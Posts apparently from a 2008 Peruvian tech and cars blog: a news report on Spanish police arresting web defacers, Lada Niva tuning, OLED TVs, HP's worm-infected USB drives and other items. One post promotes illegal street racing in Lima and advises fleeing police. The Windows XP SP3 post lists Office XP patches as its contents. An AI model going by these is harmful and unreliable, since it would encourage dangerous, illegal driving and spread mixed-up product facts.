* elmundo.es contactó con ellos y les hizo una entrevista hace dos meses


MADRID.- Algunos de ellos se hacían llamar 'ka0x, an0de, xarnuz y Piker', y en dos años habían atacado más de 21.000 páginas web, entre ellas la de Izquierda Unida justo antes de las elecciones generales del 9 de marzo.

Los cinco jóvenes, dos de ellos de 16 años, pertenecían a uno de los grupos de 'hackers' más activos de la Red, 'D.O.M. Team 2008', que ostentaba el quinto puesto en el ránking mundial de ataques informáticos según 'Zone-H', una página web que mantiene una base de datos de sabotajes a sitios de Internet.

Habían atacado la web de Jazztel, la Compañía Nacional de Teléfonos de Venezuela, un dominio de la NASA y otros sitios gubernamentales de EEUU, Latinoamérica y Asia. En su última acción, el pasado 30 de abril, accedieron a la página de Esquerra Unida de Buñol, y dos días antes protagonizaron uno de sus mayores ataques masivos. En un solo día penetraron en cerca de 800 sitios.

En la mayoría de los casos sustituían los contenidos de las webs atacadas por mensajes reivindicativos y de ciberprotesta, e incluían imágenes de simbología anarquista. Como la frase en inglés que insertaron el 24 de febrero en la página web de Jazztel: "Fuck Bush". O la que escribieron en la web de IU bajo una foto retocada de Zapatero y Rajoy: "Tenemos algo en común, le dijo un presidente a un embustero...".
En libertad con cargos

Los detenidos, que proceden de las provincias de Barcelona, Burgos, Málaga y Valencia, no se conocían personalmente, salvo dos de ellos que, según ha podido saber elmundo.es, son hermanos y viven en Sabadell. Otros dos, los arrestados en Málaga y Burgos, sólo tienen 16 años. Los cinco fueron puestos en libertad con cargos tras prestar declaración ante el juez y se enfrentan a penas de entre 1 y 3 años de cárcel.

Los 'hackers' coordinaban sus acciones a través de Internet y mantenían contactos con otros miembros del grupo en el extranjero, principalmente en Latinoamérica. En los cuatro registros practicados fueron intervenidos 20 equipos informáticos y diversa documentación que está siendo analizada. La operación, que ha sido coordinada por el Grupo de Seguridad Lógica de la Brigada de Investigación Tecnológica de la Policía Nacional, ha contado con la colaboración de agentes de la Brigada Provincial de Policía Judicial de Burgos, Málaga, Valencia y Sabadell.

La investigación se inició a principios de marzo, tras la denuncia del proveedor de servicios que alojaba la página web de IU. Su servidor fue atacado y quedaron inutilizados 15 portales ubicados en el mismo. Como consecuencia, a pocos días de las elecciones generales, la página web quedó inaccesible y su contenido fue sustituido por una caricatura de Zapatero y Rajoy firmada por los 'hackers'.

La dirección de IU se ha puesto en contacto con los responsables de la Brigada de Investigación Tecnológica para transmitirles su felicitación por las detenciones, reconociendo la dificultad de estas investigaciones en las que los delincuentes son expertos conocedores de la seguridad y laxitud de los sistemas informáticos.

Los autores del ataque, que autodenominaban a su grupo como un laboratorio de investigación en seguridad informática, eran cinco jóvenes estudiantes, dos de ellos menores de edad. Uno de los responsables había publicado artículos relacionados con técnicas de 'hacking' en foros de seguridad informática conocidos mundialmente e incluso diseñaba sus propios 'exploits' y 'troyanos' (programas maliciosos que explotan fallos de seguridad y vulnerabilidades de los sistemas).

En la comunidad 'hacker' existe la idea bastante extendida de que los 'deface' son hechos no sólo inofensivos, sino que contribuyen al mantenimiento de la seguridad en la Red. Mediante estos ataques alertan a los administradores de la existencia de vulnerabilidades en sus espacios web. Sin embargo, en muchas ocasiones estas acciones provocan costosos daños y pérdidas económicas.

Las técnicas utilizadas en este tipo de intrusiones exigen en muchos casos conseguir privilegios de administrador en la máquina. Para conseguirlos se utilizan 'exploits' y 'rootkits' que a menudo tienen efectos secundarios irreversibles sobre el sistema operativo de los servidores. En el caso de IU los atacantes 'secuestraron' totalmente el servidor modificando incluso la contraseña de administración del mismo. Fue necesario reinstalar totalmente el software y restaurar una copia de seguridad para restablecerlo a su estado anterior.

Una actuación policial coincide con la celebración del Día Internacional de Internet cuyo objetivo es promover la importancia de las Tecnologías de la Información y la Comunicación en una sociedad global. Unas nuevas tecnologías que nos abren las puertas a la información sin fronteras, introducen nuevas técnicas de comercio, otras formas de interrelacionarse, de jugar o aprender; pero la Red puede ser también una vía de actuación para los delincuentes. La Brigada de Investigación Tecnológica rastrea la red en busca de esos ciberdelincuentes y con el objetivo de construir una Internet segura para todos.

Mr Coronas y CVCVNA

Como estan todos aqui les traigo un poco de Hip Hop Mr. Coronas es un rapero de calle made in Perú vive en Santa Catalina y tiene un estilo particular, el sale del bajo mundo de la calle aunque conoce el trago fino por eso conoce los dos mundos antes ha estado del otro lado del gueto y sabe lo que dicen sus canciones, realmente promete escuchenlo.


domingo, 4 de mayo de 2008

Archivos encontrados del testeo del Lada Niva 4x4

Pongo aqui en conocimientos algunos archivos encontrados en un servidor, para aquellas personas que poseen un Lada Niva 4x4 (sólo deben darle clic a la imagen para verla mejor)

Travesía a bordo de un Hummer en USA

En este video verán una travesía de unos Hummers en USA un lugar apropiado sólo para un Hummer. realmente recomiendo ver este video si tienes una 4x4 o si piensas tener una.


New monitores y Tv Sony arrancó con la nueva tecnologia de pantallas organicas

Vamos a producir en masa y comercializar de aquí al final de este año modelos OEL de 11 pulgadas (28 centímetros) de diagonal, lo que supone una primicia mundial", declaró a AFP un director de Sony, Chisato Kitsukawa.

El OEL, también llamado OLED, es un tipo de panel autoluminoso con mucho contraste que ofrece una amplia paleta de matices. Está considerada como una de las tecnologías más prometedoras para la próxima generación de televisores de alta definición.

Este tipo de pantalla no necesita dispositivo de retroiluminación, ya que la luz nace de la circulación de una corriente eléctrica a través de un material luminiscente orgánico, por lo que tiene un espesor menor y menos consumo eléctrico.

Los prototipos de las TV OEL Sony se distinguen por la delgadez de su perfil sólo tienen 3 milimetros de espesor.

La tecnología OEL, que salió comercialmente a finales de los años 90, no ha sido empleada hasta ahora más que para algunos modelos de aparatos pequeños (teléfonos móviles, reproductores o radios para coches) por la dificultad de producir grandes modelos y por una duración insuficiente de vida para otras aplicaciones.

"El modelo de once pulgadas que vamos a comercializar tiene una esperanza de vida que corresponde a la duración media de uso constatada de este tipo de productos, casi siete años", aseguró Kitsukawa.

El precio de los televisores amplía en un primer momento a los de los modelos de similar tamaño de cristal líquido (LCD); así en estos momentos se esta vendiendo a $2000 las tv con pantalla organica de 17".

RAPIDOS Y FURIOSOS en Lima: Las carreras y piques

Todos los jueves a media noche frene al estadio de la U (la Molina) se reunen los amigos y amantes de los autos, las carreras, y la potencia. los mejores autos compiten aveces apostando, pero lo que siempre hay son carreras; muchas veces entran las 4x4 a competir probando sus fierros a fondo sacando ventaja a los autos; que no le sorprenda que encuentren autos de los olivos miraflores o surco y diversos distritos compitendo desde los mas nuevos como audi, subaru impresa 2008, toyota celica o nisan skyline estan entre otros, aqui lo que importa es correr la adrenalina.

Otros algo antiguos de los 80's que no despiertan sospechas pero bajo el capó aveces puede encontrar un mounstro que lo guardan sigilosamente para la proxima competencia. admiradores de estas carreras suelen venir en autos o grupos de motos y filman las carreras tratando de adivinar quien gana.

Bueno ya saben el pequeño dato y si te gustan los autos o quieres poner a prueba el tuyo ya sabes donde probarlo; pero si ves a la policia sólo viendo a los demás ya sabes que hacer... huiirr!! quemando las llantas. sólo hay dos points este es uno de ellos el otro te lo comunicarán por radio o nextel.




El auto anfibio

Como están todos! aqui les traigo algo increible, el auto anfibio lo puedes usar tanto en la calle y apretando un boton puedes tranformarlo en un veloz bote, para no seguir hablando veanlo ustedes mismos.


viernes, 2 de mayo de 2008

HACK-LOVER Cumplió 1 añito

El lunes 28 de Abril pasado cumplimos 1 año y festejamos a lo grande con algunas amigas en cieneguilla con una rica parrillada y con un gran amigo que hoy se encuentra repuesto despues de una batalla dificil de salud.

¡Feliz aniversario! www.Hack-Lover.blogspot.com siempre siguiremos brindandoles información más noticias novedades y siempre lo último en tecnología en el mundo de la informática pronto colocaremos novedosos programas utiles para cualquiera de ustedes por ejemplo nos ha llegado a nuestras manos un software para escanear autos que tengan computadoras internas.

Tuning Lada Niva V















Hola gente como estan seguimos con el tuning para nuestro Lada Niva, en uno de nuestros paseos encontramos a su hermano cerca de la Av. Ayacucho en Surco era una pena verlo en un estado descuidado.

Se le coloco llantas nuevas mas altas y Brigstone Dueler 215/75/R15 para que no nos de problemas en el viaje, para los que no estan enterados el viaje es el 15 de Mayo del 2008 objetivo Huancaya, duración 3 dias.

Se le colocó otro motor 2105 que según el manual tiene 1500 centimetros cubicos, si nos restará un poco de potencia porque el anterior era 1600 pero también nos consumira menos combustible y nos dará un ahorro extra; el nuevo motor con respecto al otro cuenta con una faja de distribución le restará ese sonidito clasico de cadena en la Niva original, tambien se le hizo cambio de rodajes, Bocinas y un completo cambio de terminales de dirección.

A continuación veran a nuestro mecanico el Sr Italo mas conocido como el abuelo de las Nivas, practicamente es una leyenda en el mundo mecanico, no hay quien no lo conosca además de ser honesto hace un perfecto trabajo y te da la respuesta inmediata a tu problema.



Y en este siguiente video podran ver una pequeña reunión del club Niva donde se muestran algunas de las mejores y modificadas Nivas que hay en Lima-Perú


martes, 29 de abril de 2008

Hoy gran actualización de Windows XP Service Pack 3 (SP3)



La tercera gran actualización de Windows XP estará disponible desde el VIERNES Abril 25th, 2008 1 EXPRESADO Microsoft ha enviado ya a los fabricantes encargados de copiarla a decenas de miles de CDs el Service Pack 3 (SP3) para Windows XP, señal inequívoca de que su lanzamiento es inminente, según informa hoy The Register. Este programa es la tercera gran actualización del sistema operativo más usado del planeta desde que saliese al mercado en 2001. Para la gran mayoría de los usuarios, la actualización estará disponible para su descarga automática de Internet mediante el servicio Windows Update a partir de hoy martes, 29 de abril. Como en las dos ocasiones anteriores, la actualización implica modificaciones de cierto calado en el funcionamiento del sistema operativo, por lo que algunos programas podrían dejar de responder. Microsoft asegura sin embargo que sus usuarios no notarán “de forma significativa” el cambios. La actualización es voluntaria (los usuarios pueden rechazarla si así lo prefieren), aunque recomendable desde el punto de vista de la seguridad, ya que incluye parches para solucionar algunos de los problemas de seguridad que más dolores de cabeza han dado en los últimos meses a los ingenieros de Microsoft. Quienes no dispongan de conexión a Internet,o cuenten con un ancho de banda reducido, podrán solicitar a la empresa que le envíe un CD con la actualización dentro.

Entre los problemas corregidos en este Service Pack se encuentran los siguientes:

* El descrito en el boletín de seguridad MS02-044 (sobre funciones no seguras en Office Web Components)

* El descrito en el boletín de seguridad MS02-059 (error en Word y Excel puede provocar la revelación de información sensible)

* El descrito en el boletín de seguridad MS02-067 (error en procesamiento de cabecera de e-mails puede provocar el fallo de Outlook 2002)

* El descrito en el boletín de seguridad MS03-003 (error en Outlook 2002 con certificados de Exchange Server Security puede llevar a la revelación de información sensible)

* El descrito en el boletín de seguridad MS03-035 (error en Microsoft Word puede permitir la ejecución automática de macros)

* El descrito en el boletín de seguridad MS03-036 (desbordamiento de búffer en conversor de WordPerfect puede permitir la ejecución de código)

* El descrito en el boletín de seguridad MS03-037 (error en Visual Basic For Applications podría permitir la ejecución de código arbitrario)

* El descrito en el boletín de seguridad MS03-038 (falta de comprobación de búffer en Microsoft Access Snapshot Viewer puede permitir la ejecución de código)

* El descrito en el boletín de seguridad MS04-004 (vulnerabilidad en Microsoft Outlook puede permitir la ejecución de código)

El service pack incluye además todas las actualizaciones publicadas para Office XP:

* Service Pack 1
* Service Pack 2
* Actualización de Excel 2002 del 16 de octubre de 2002
* Actualización de Word 2002 del 16 de octubre de 2002
* Actualización de Outlook 2002 del 4 de diciembre de 2002
* Actualización de Outlook 2002 del 22 de enero de 2003
* Actualización de herramientas de gramática en Italiano para Office XP (B813682)
* Parche de seguridad para Office XP (KB822036)
* Parche de seguridad para Access 2002 Snapshot Viewer (KB826293)
* Parche de seguridad para convertidor de WordPerfect 5.x de Office XP (KB824938)
* Parche de seguridad para Word 2002 (KB824934)
* Parche de seguridad para Excel 2002 (KB830350)
* Parche de seguridad para Word 2002 (KB830346)

Este Service Pack 3 se instalará correctamente en el sistema aunque ya haya instalado cualquiera de los anteriormente nombrados Service Packs o actualizaciones e incluye algunas mejoras de la estabilidad del producto realizadas a raíz de peticiones de usuarios realizadas mediante la herramienta Error Reporting Tool y desde la central de soporte de productos Microsoft.
Descargate el Sp3 para XP AQUI

martes, 15 de abril de 2008

IBM saca el superordenador p575 refrigerado por agua

El nuevo superordenador p575 incorpora un sistema único en el que unas placas de cobre refrigeradas por agua, situadas encima de cada microprocesador, absorben constantemente el calor.

IBM ha anunciado el lanzamiento de un nuevo superordenador refrigerado por un revolucionario sistema de agua, que puede reducir en más de un 80% el número de unidades de aire acondicionado necesarias en una configuración de servidores típica. La compañía anuncia además el servidor UNIX más rápido del mercado, denominado p595.

Ambos sistemas están basados en el procesador Power 6 (de hasta 5 GHZ) y suponen un aprovechamiento de la tecnología de IBM y reducir los costes de operación de los centros de datos, mejorando a la vez el rendimiento del sistema para que los clientes puedan migrar a una nueva generación de centros de datos.

El nuevo superordenador p575 incorpora un sistema único en el que unas placas de cobre refrigeradas por agua, situadas encima de cada microprocesador, absorben constantemente el calor. Se trata del primer sistema de IBM refrigerado por agua desde 1995 y supone una revolución en el aspecto ecológico.

Este sistema permite reducir el consumo de energía típico de un centro de datos en un 40 % y requiere un 80% menos de unidades de aire acondicionado. Los investigadores de IBM estiman que el agua puede ser 4.000 veces más eficaz que el aire para refrigerar sistemas informáticos.

El nuevo servidor UNIX Power 595 está diseñado para solucionar las principales preocupaciones de las corporaciones: energía, espacio físico y gestión de sistemas. El rendimiento de una máquina Power de IBM de 64 núcleos es el doble que el de un sistema HP Superdome Itanium configurado de forma similar y al mismo precio.

El nuevo servidor, de 64 núcleos incorpora Power 6 y tiene un ancho de banda de 1,3 Terabytes por segundo, que permitiría transferir en un segundo la cantidad de información impresa en el papel que se obtendría de 50.000 árboles.

Con hasta 254 particiones virtuales y 4 TB de memoria, el Power 595 integra tecnología de virtualización PowerVM para consolidación a gran escala. Más del 90% de los servidores de empresa Power Systems usan actualmente PowerVM para ahorrar energía y gestionar más eficazmente los costes de TI.

HP distribuye memorias USB infectadas con gusanos

HP ha liberado una cantidad no determinada de memorias USB, infectadas con dos gusanos que han causado varios problemas a sus clientes. La memoria es utilizada en numerosos modelos de servidores Proliant.

Los malwares contenidos en las unidades USB, son identificados como variantes de gusanos como Fakerecy (una variante de Win32/VB para ESET), SillyFDC y otros, que se propagan replicándose en unidades del sistema tanto extraíbles como mapeadas en red, además de hacerlo a través de programas de mensajería instantánea, enviando mensajes con enlaces a todas las listas de contacto del usuario infectado.

El equipo de respuestas de seguridad de HP, advirtió esta semana haber descubierto los gusanos en dichas unidades USB, y proporcionó una lista de los modelos de servidores afectados. Para averiguar si una unidad está infectada, HP recomienda examinar las mismas en un sistema que cuente con un programa antivirus actualizado. Según HP, los clientes que utilicen un antivirus al día no son afectados, ya que ambos gusanos son detectados desde hace tiempo.

Dado que las unidades involucrados son utilizadas para instalaciones opcionales en esta clase de servidores, el porcentaje de víctimas podría ser muy pequeño.

Aunque en este caso, el escenario principal de la infección estaría restringido solo a usuarios de este tipo de servidores, lo que limita el espectro de la amenaza, este tipo de accidente no es la primera vez que ocurre.
Recientemente informábamos de infecciones similares en dispositivos como iPods, sistemas de navegación, y otros populares juguetes tecnológicos como portarretratos para fotografías digitales.
En la mayoría de los casos, el software malicioso suele ser introducido en estos dispositivos en la parte final de la producción, cuando los artefactos salen de la línea de montaje y son conectados a una computadora para asegurarse de que todo funciona.

Si por ejemplo la computadora de pruebas está comprometida por culpa de un empleado que utiliza la misma para conectar su propio dispositivo infectado, todo lo que sea conectado a ella podría ser también infectado.

Marcas serias como HP, no escapan de este riesgo, como lo demuestra este caso, por lo que siempre debemos asegurarnos de tener la protección adecuada en nuestro PC antes de insertar cualquier clase de dispositivo que contenga datos. Esto incluye desde los ya antiguos disquetes, hasta CDs, DVDs o memorias USB, sin importar que estos vengan con un producto recién comprado.

HP asegura haber determinado el origen de la infección, y dice haber resuelto el problema.